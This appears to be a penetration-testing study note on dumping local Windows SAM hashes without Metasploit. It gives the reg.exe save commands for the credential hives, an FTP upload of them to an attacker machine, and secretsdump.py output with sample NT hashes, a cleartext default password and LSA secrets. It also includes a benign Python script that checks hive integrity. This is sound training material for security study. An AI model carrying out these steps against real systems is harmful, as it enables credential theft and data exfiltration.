Windows SAM Hashes

This is the manual equivalent of the hashdump command in the (frowned-upon-by-OffSec) Metasploit Framework: the same local SAM hashes, obtained with built-in Windows tooling and an offline parser instead of a Meterpreter session.

Get SAM, SECURITY, and SYSTEM

On the exploited Windows system, from an elevated (administrator) shell, save the three hives (SAM and SECURITY are not readable by ordinary users, and SYSTEM holds the boot key needed to decrypt the other two):

C:\> reg.exe save hklm\sam sam
C:\> reg.exe save hklm\security security
C:\> reg.exe save hklm\system system

Then get these files to your attacker box, e.g. using FTP:

ftp> bin
200 TYPE is now 8-bit binary
ftp> put system
200 PORT command successful
ftp> put security
200 PORT command successful
ftp> put sam
200 PORT command successful
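A quick way to confirm the uploaded hives were not mangled by an ASCII-mode transfer, before spending time on secretsdump.py, is to validate the REGF base block that every hive file starts with: the "regf" magic, matching primary/secondary sequence numbers, the XOR-32 header checksum at offset 0x1FC, and 4096-byte alignment of the file. The script below is an added example for this page (it is not part of the original write-up or of Impacket); the hive image it checks is constructed inline and is not a real SAM.

```python
"""Check that saved registry hives survived the transfer intact.

Added example for this page; not part of the original write-up or of Impacket.
A hive written by `reg.exe save` begins with a 512-byte REGF base block: the
magic "regf" at offset 0, primary/secondary sequence numbers at offsets 4 and
8, and at offset 0x1FC a 32-bit XOR checksum of the preceding 508 bytes taken
as little-endian DWORDs. Hive files are also 4096-byte aligned. An FTP transfer
in ASCII mode rewrites 0x0A / 0x0D bytes, which shifts or alters the header, so
these checks fail loudly on a hive that was uploaded without `bin`.
"""
import struct

REGF_MAGIC = b"regf"
BASE_BLOCK_SIZE = 512
CHECKSUM_OFFSET = 0x1FC
HIVE_ALIGNMENT = 4096


def regf_checksum(base_block: bytes) -> int:
    """XOR-32 of the first 508 bytes, with the two reserved results Windows avoids."""
    xor = 0
    for (dword,) in struct.iter_unpack("<I", base_block[:CHECKSUM_OFFSET]):
        xor ^= dword
    if xor == 0xFFFFFFFF:
        return 0xFFFFFFFE
    if xor == 0:
        return 1
    return xor


def check_hive(data: bytes) -> list:
    """Return a list of problems; an empty list means the header is consistent."""
    if len(data) < BASE_BLOCK_SIZE:
        return [f"only {len(data)} bytes, shorter than the REGF base block"]
    header = data[:BASE_BLOCK_SIZE]
    problems = []
    if header[:4] != REGF_MAGIC:
        problems.append(f"bad magic {header[:4]!r}")
    primary_seq, secondary_seq = struct.unpack_from("<II", header, 4)
    if primary_seq != secondary_seq:
        # reg.exe save writes a consistent snapshot, so these match on a clean hive
        problems.append(f"sequence numbers differ ({primary_seq} != {secondary_seq})")
    stored = struct.unpack_from("<I", header, CHECKSUM_OFFSET)[0]
    computed = regf_checksum(header)
    if stored != computed:
        problems.append(f"checksum mismatch: stored 0x{stored:08x}, computed 0x{computed:08x}")
    if len(data) % HIVE_ALIGNMENT:
        problems.append(f"size {len(data)} is not a multiple of {HIVE_ALIGNMENT}")
    return problems


def build_sample_hive() -> bytes:
    """Constructed minimal hive image (not a real SAM): a valid base block plus
    one empty 4096-byte hive bin. Sequence number 10 puts 0x0A bytes into the
    header, as a real hive easily can, so an ASCII-mode transfer has something
    to mangle."""
    header = bytearray(BASE_BLOCK_SIZE)
    struct.pack_into("<4sII", header, 0, REGF_MAGIC, 10, 10)   # magic, primary, secondary seq
    struct.pack_into("<IIII", header, 0x14, 1, 3, 0, 1)        # major 1, minor 3, type, format
    struct.pack_into("<III", header, 0x24, 0x20, 0x1000, 1)    # root cell, hbins size, cluster
    struct.pack_into("<I", header, CHECKSUM_OFFSET, regf_checksum(bytes(header)))
    base_block = bytes(header).ljust(HIVE_ALIGNMENT, b"\x00")
    hbin = b"hbin".ljust(HIVE_ALIGNMENT, b"\x00")
    return base_block + hbin


def ascii_mode_mangle(data: bytes) -> bytes:
    """Simulate one of the line-ending translations an ASCII-mode FTP transfer
    applies (LF -> CRLF); the reverse direction corrupts a hive just as badly."""
    return data.replace(b"\n", b"\r\n")


SAMPLE_HIVE = build_sample_hive()

if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        for path in sys.argv[1:]:
            with open(path, "rb") as f:
                problems = check_hive(f.read())
            print(path, "OK" if not problems else "; ".join(problems))
    else:
        print("intact hive:    ", check_hive(SAMPLE_HIVE))
        print("ASCII-mode copy:", check_hive(ascii_mode_mangle(SAMPLE_HIVE)))
```

Saved as, say, check_hive.py (a hypothetical name), run `python3 check_hive.py sam security system` on the attacker box; a hive that fails the checksum or alignment check should be re-uploaded after `bin`. Without arguments it checks the constructed sample and a simulated ASCII-mode copy of it.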

The bin command is VERY important: in ASCII mode the FTP client rewrites line-ending bytes (0x0A/0x0D) in what it transfers, which silently corrupts the binary hive files, and the next step will fail. Next, run the Impacket Python script secretsdump.py against the three saved hives; its output looks like this:

Impacket v0.9.18-dev - Copyright 2002-2018 Core Security Technologies

[*] Target system bootKey: 0x371c6e102028a5b0e79ccc268d721c26
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8f53ac7dfad4fe8c3e632e6d3becdccd:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:11e102c7f485f3e21f5ca486c7d85b4c:::
kevin:1000:aad3b435b51404eeaad3b435b51404ee:3164f206290117d74e9fa582139828d4:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:173cf47d45ff85470ccd9c4bd609c518:::
trevelyn:1003:aad3b435b51404eeaad3b435b51404ee:7213b1af7ba9bfea55d6305a0a6686f5:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] DefaultPassword 
(Unknown User):r4UBwM8sSx
[*] DPAPI_SYSTEM 
 0000   01 00 00 00 CC 5F BF 2F  58 69 C0 13 E9 00 2B A9   ....._./Xi....+.
 0010   E7 95 6D 7C 68 4B 7C C1  23 E2 DE 6F 48 70 31 8E   ..m|hK|.#..oHp1.
 0020   96 26 83 EC 16 98 BD 9F  ED 01 EE 7C               .&.........|
DPAPI_SYSTEM:01000000cc5fbf2f5869c013e9002ba9e7956d7c684b7cc123e2de6f4870318e962683ec1698bd9fed01ee7c
[*] NL$KM 
 0000   BC 28 86 EE C0 B6 91 0A  8C 2D 84 63 A0 BE 36 B7   .(.......-.c..6.
 0010   56 38 88 99 72 53 44 DC  51 CE F5 51 D1 4E 37 B8   V8..rSD.Q..Q.N7.
 0020   2E 28 23 C5 70 BB 5E EB  13 38 9D 42 8E B1 17 6A   .(#.p.^..8.B...j
 0030   E2 89 4E CF AB 6F 73 CE  1D 0E 8B BA 58 D0 1E 72   ..N..os.....X..r
NL$KM:bc2886eec0b6910a8c2d8463a0be36b756388899725344dc51cef551d14e37b82e2823c570bb5eeb13389d428eb1176ae2894ecfab6f73ce1d0e8bba58d01e72
[*] Cleaning up...